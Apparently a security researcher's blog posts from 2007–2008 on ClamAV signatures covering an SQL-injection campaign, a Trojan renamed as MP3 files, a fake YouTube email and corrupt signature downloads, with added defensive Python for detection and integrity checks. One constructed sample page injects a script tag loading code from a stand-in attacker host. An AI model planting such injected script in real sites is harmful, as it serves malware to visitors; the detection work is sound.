
Tuesday, 20 May 2008

SQL Injection: example blocked

There are still a huge number of SQL-injected sites out there (list of serving sites).

For example:

Looking at the HTML of the site, you can see the .js file, pulled in by a script tag that has been injected inside the TITLE element:
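
The following is an added example, not code from this blog, from SaneSecurity or from ClamAV: a small page audit that reports any script reference rendered inside the title element, which is where the injected .js showed up on the site above, and, as a broader check, any script loaded from a host other than the page's own. The sample pages and the hostnames in them are constructed for illustration.

```python
# Added example, not code from the SaneSecurity blog or from ClamAV: report
# <script src=...> tags rendered inside <title> (where the injected .js showed
# up on the page above) plus any script loaded from a third-party host.
# Hostnames and pages below are constructed for illustration.
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptAudit(HTMLParser):
    """Collect every <script src> and whether it sits inside <title>."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self.scripts = []  # list of (src, inside_title)

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so an injected
        # <SCRIPT SRC=...> is handled exactly like the lowercase spelling.
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((src, self._in_title))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False


def audit_page(html, page_host):
    """Return [(finding, src), ...]: scripts a legitimate <title> never holds,
    and scripts fetched from a host other than page_host."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for src, in_title in parser.scripts:
        host = urlsplit(src).hostname  # None for relative paths like /js/site.js
        if in_title:
            findings.append(("script-in-title", src))
        elif host and host.lower() != page_host.lower():
            findings.append(("external-script", src))
    return findings


# Constructed sample: a page whose stored title was rewritten by a mass
# SQL injection to pull in a script from an attacker-controlled host.
INJECTED_PAGE = (
    "<html><head><title>Widgets Inc"
    '<SCRIPT SRC="http://evil.example/b.js"></SCRIPT></title>'
    '<script src="/js/site.js"></script></head><body>Hello</body></html>'
)

# Constructed sample: the same page as its owner intended it.
CLEAN_PAGE = (
    "<html><head><title>Widgets Inc</title>"
    '<script src="https://www.widgets.example/js/site.js"></script>'
    "</head><body>Hello</body></html>"
)

if __name__ == "__main__":
    for label, page in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(label, audit_page(page, "www.widgets.example"))
```

The title check is the cheap, high-confidence one: no legitimate page loads a script from inside its title. The external-host check is noisier on real sites (CDNs, analytics) and is best run against an allowlist of hosts you expect.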

If you are using ClarkConnect (or other ClamAV-based web filtering), the latest update to the SaneSecurity signatures should help block the sites currently serving the script:

Signature(s):

Email.Malware.Sanesecurity.08051902.SQLInj (generic)
Email.Malware.Sanesecurity.08052000.SQLInj (generic)
Email.Malware.Sanesecurity.08052001.SQLInj (generic)
Email.Malware.Sanesecurity.08052002.SQLInj (generic)
Email.Malware.Sanesecurity.08052003.SQLInj (generic)
Email.Malware.Sanesecurity.Url.SQLInj_xx

Wednesday, 7 May 2008

Rogue MP3 Trojan streaks across P2P networks

Hopefully people have seen this already, but it's worth posting:


Hundreds of thousands of examples of a new Trojan that poses as a media file have flooded onto P2P networks.

Since Friday 2 May more than half a million instances of the Trojan have been detected on consumer PCs, according to net security firm McAfee. The anti-virus firm reports the spread of the Downloader-UA.h Trojan as the most significant malware outbreak in the last three years.

Source: The Register
Source: McAfee

What's interesting about this is that I came across this "new" idea in a post by ISS (dated 29th April), which you can see here.

While the above post talked about .ASF files, all the bad guys have done is rename the .asf files to .mp3. Windows Media Player does not go by the extension: it reads the ASF metadata in the header and runs the embedded script command anyway :(

SaneSecurity ClamAV generic detection was added on 30th April 2008 for this new idea, so I was interested to find that these "new" mp3s McAfee are talking about are found using the same generic signature :)

E.g.: eview-T-3545425-turbanlporno.mp3: Email.Malware.Sanesecurity.08043001.WmaScript FOUND

Note: you must be using ClamAV v0.93 to be able to detect this.
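
The following is an added example, not code from this blog, from SaneSecurity, ClamAV or McAfee: it does what the post says the player does, identifying a file by its ASF header rather than its extension, and additionally walks the ASF header objects to flag files that carry a Script Command object (the object an ASF file uses to make Windows Media Player open a URL). The ASF GUID values are from the published ASF format; the sample files are built in build_asf() and contain no real commands or URLs.

```python
# Added example, not code from the SaneSecurity blog, ClamAV or McAfee: decide
# what a "media" file really is from its header rather than its extension, and
# flag ASF containers that carry a Script Command object. The sample files are
# constructed in build_asf(); none of this is real malware.
import struct

# ASF object GUIDs as stored on disk (first three GUID fields little-endian).
ASF_HEADER_OBJECT = bytes.fromhex("3026b2758e66cf11a6d900aa0062ce6c")
ASF_SCRIPT_COMMAND_OBJECT = bytes.fromhex("301afb1e620bd011a39b00a0c90348f6")
ASF_EXTENSIONS = {"asf", "wma", "wmv"}


def sniff(data):
    """Classify by magic bytes: 'asf', 'mp3' or 'unknown'."""
    if data.startswith(ASF_HEADER_OBJECT):
        return "asf"
    if data.startswith(b"ID3"):  # ID3v2 tag ahead of the audio frames
        return "mp3"
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3"  # bare MPEG audio frame sync
    return "unknown"


def asf_header_objects(data):
    """Yield (guid, body) for each top-level object inside the ASF Header Object.

    Layout: 16-byte GUID, 8-byte size, 4-byte object count, 2 reserved bytes,
    then sub-objects of 16-byte GUID + 8-byte size (size includes those 24).
    """
    if len(data) < 30 or not data.startswith(ASF_HEADER_OBJECT):
        return
    (header_size,) = struct.unpack_from("<Q", data, 16)
    end = min(header_size, len(data))
    pos = 30
    while pos + 24 <= end:
        guid = data[pos:pos + 16]
        (size,) = struct.unpack_from("<Q", data, pos + 16)
        if size < 24 or pos + size > end:  # bogus size: stop, never read past the buffer
            return
        yield guid, data[pos + 24:pos + size]
        pos += size


def has_asf_script_command(data):
    return any(guid == ASF_SCRIPT_COMMAND_OBJECT for guid, _ in asf_header_objects(data))


def assess(filename, data):
    """Return the flags a mail or web filter would raise for this name/content pair."""
    flags = []
    kind = sniff(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind == "asf" and ext not in ASF_EXTENSIONS:
        flags.append("extension-mismatch")  # e.g. an ASF renamed to .mp3
    if kind == "asf" and has_asf_script_command(data):
        flags.append("script-command")
    return flags


def build_asf(with_script):
    """Constructed minimal ASF header, optionally with an (empty) Script Command object."""
    objs = b""
    if with_script:
        body = b"\x00" * 16  # stand-in; a real object lists commands such as URLANDEXIT
        objs += ASF_SCRIPT_COMMAND_OBJECT + struct.pack("<Q", 24 + len(body)) + body
    count = 1 if with_script else 0
    return (ASF_HEADER_OBJECT + struct.pack("<Q", 30 + len(objs))
            + struct.pack("<I", count) + b"\x01\x02" + objs)


if __name__ == "__main__":
    print(assess("movie.wmv", build_asf(False)))  # []
    print(assess("track.mp3", build_asf(True)))   # ['extension-mismatch', 'script-command']
```

The extension mismatch alone is what the renamed files above would trip; the script-command flag separates a plain renamed clip from one that will send the player to a URL. A generic signature like the one quoted above does the same job inside ClamAV.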

Monday, 12 November 2007

Fake YouTube email spammed

An interesting fake YouTube email has just been spammed:

As you can see from the link, it's a fake YouTube site, which takes you here:

Current VirusTotal detection for the install_flash_player.exe file:

Email detected as: Email.Malware.Sanesecurity.07111200

Friday, 5 October 2007

0hour testing

Well, a new email came in which looked very odd. Here are the headers:

Return-Path:
Received: from 88-139-180-230.adslgp.cegetel.xxx (88-139-180-230.adslgp.cegetel.
by raq0402.keele.netcentral.co.xx (8.9.3/8.9.3) with ESMTP id JAA02419
for ; Fri, 5 Oct 2007 09:28:25 +0100
Received: from [88.139.180.230] by mx2.servershost.xxx; Fri, 5 Oct 2007 02:37:20
From: "Shirley Xxxxxxx"
Date: Fri, 5 Oct 2007 02:37:20 +0100

Here's the actual email:

So, I submitted the zip file to VirusTotal to see what the latest detection was like, and then resubmitted the same file at various times after that to see roughly when vendors added detection.

Note: it's not exactly scientific, so your mileage may vary etc.

Here are the results:

As you can see, Antivir did well!

The ClamAV team did a very quick job of adding this one, still beating the big boys:

F-Secure and F-Prot now have detection:

Nod32 users now covered:

Kaspersky users now covered:

For the AVG users out there, detection has now been added:

Here's the situation on Monday morning:

Wednesday, 19 September 2007

SaneSecurity News: Corrupt Signatures

For a few hours today, one of the mirrors had a corrupt version of phish.ndb.gz.

After being alerted to the fact by a user, I informed the mirror admin about the issue and the problem was then fixed.

The scripts on the SaneSecurity site check the integrity of the signatures before they are moved into the ClamAV database directory for use, and have done for some time.

This is important not only for the SaneSecurity signatures but for any third-party signatures: if you move a corrupt signature file into the ClamAV database directory, ClamAV will fail to load it and stop scanning your email until you sort the problem out.

If you're running your own script or have an old version of the SaneSecurity scripts, it might be worth updating them:

http://sanesecurity.co.uk/clamav/usage.htm

I do always check signature integrity before uploading, so they leave here fine, but the end user must always double-check their download integrity before use.
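
The following is an added example of the check the post recommends; it is not the SaneSecurity update script itself. It validates a downloaded gzipped .ndb (the format of phish.ndb.gz) in three steps: the compressed stream must decompress cleanly, every non-comment line must match the .ndb line grammar, and, where clamscan is installed, the engine itself must load the file. Only then is it copied next to the target and renamed into place. File names, paths and the sample signatures in demo() are assumptions for illustration.

```python
# Added example, not the SaneSecurity update script itself: validate a
# downloaded third-party signature file (a gzipped .ndb such as phish.ndb.gz)
# before it is placed in the ClamAV database directory, so a corrupt download
# can never take the scanner down. File names, paths and the sample signatures
# below are assumptions for illustration.
import gzip
import os
import re
import shutil
import subprocess
import tempfile

# One .ndb line: MalwareName:TargetType:Offset:HexSignature[:MinFL[:MaxFL]]
# The hex body may carry ClamAV wildcards: ?? * {n-m} (aa|bb) [n-m] !
NDB_LINE = re.compile(r"^[^:]+:[0-9]:[^:]+:[0-9a-fA-F?*{}()|\[\]!-]+(?::[0-9]+){0,2}$")


class SignatureError(Exception):
    """Raised for any defect; the caller leaves the database directory alone."""


def ndb_valid(text):
    """True if the database is non-empty and every non-comment line parses."""
    lines = [l for l in text.splitlines() if l and not l.startswith("#")]
    return bool(lines) and all(NDB_LINE.match(l) for l in lines)


def load_gz_ndb(path):
    """Decompress and syntax-check; return the raw bytes or raise SignatureError."""
    try:
        with gzip.open(path, "rb") as fh:
            raw = fh.read()  # a truncated or corrupt stream raises here
    except (OSError, EOFError) as exc:
        raise SignatureError(f"{path}: corrupt gzip ({exc})")
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        raise SignatureError(f"{path}: not a text database")
    if not ndb_valid(text):
        raise SignatureError(f"{path}: malformed .ndb line(s)")
    return raw


def engine_loads(ndb_path):
    """If clamscan is installed, make the engine load the file itself.
    Exit status 2 signals an error such as a malformed database; 0 and 1 mean it loaded."""
    clamscan = shutil.which("clamscan")
    if clamscan is None:
        return True  # engine not available here; the syntax check above is all we have
    probe = os.path.join(os.path.dirname(ndb_path), "probe.txt")
    with open(probe, "w") as fh:
        fh.write("probe\n")
    rc = subprocess.run([clamscan, "--quiet", "-d", ndb_path, probe],
                        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode
    return rc in (0, 1)


def install_signature(src_gz, dbdir):
    """Validate src_gz and install it as dbdir/<name without .gz>.
    Raises SignatureError and leaves dbdir untouched on any failure."""
    base = os.path.basename(src_gz)
    name = base[:-3] if base.endswith(".gz") else base  # phish.ndb.gz -> phish.ndb
    raw = load_gz_ndb(src_gz)
    with tempfile.TemporaryDirectory() as scratch:
        tmp = os.path.join(scratch, name)  # keep the .ndb extension: clamscan picks the parser from it
        with open(tmp, "wb") as fh:
            fh.write(raw)
        if not engine_loads(tmp):
            raise SignatureError(f"{src_gz}: ClamAV refused to load it")
        # Copy next to the target, then rename: os.replace is atomic on one
        # filesystem, so clamd never sees a half-written database.
        staged = os.path.join(dbdir, name + ".new")
        shutil.copyfile(tmp, staged)
        os.chmod(staged, 0o644)
        os.replace(staged, os.path.join(dbdir, name))
    return os.path.join(dbdir, name)


def demo():
    """Constructed samples: a good database, a truncated download and one with a
    bogus line. Returns {filename: installed?} plus the final directory listing."""
    good = b"Test.Sig.Good:0:*:48656c6c6f\n# comment\nTest.Sig.Good2:1:EP+0:4d5a{2-4}90??\n"
    samples = {
        "good.ndb.gz": gzip.compress(good),
        "trunc.ndb.gz": gzip.compress(good)[:12],
        "bad.ndb.gz": gzip.compress(b"this is not a signature line\n"),
    }
    results = {}
    with tempfile.TemporaryDirectory() as work:
        dbdir = os.path.join(work, "db")
        os.mkdir(dbdir)
        for fname, blob in samples.items():
            path = os.path.join(work, fname)
            with open(path, "wb") as fh:
                fh.write(blob)
            try:
                install_signature(path, dbdir)
                results[fname] = True
            except SignatureError:
                results[fname] = False
        results["dbdir"] = sorted(os.listdir(dbdir))
    return results


if __name__ == "__main__":
    print(demo())  # {'good.ndb.gz': True, 'trunc.ndb.gz': False, 'bad.ndb.gz': False, 'dbdir': ['good.ndb']}
```

The rename at the end is the part most home-grown scripts get wrong: writing or decompressing straight into the database directory means a reload can pick up a half-written file even when the download itself was fine.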

Apologies for the corrupt file and any problems caused.

Cheers,

Steve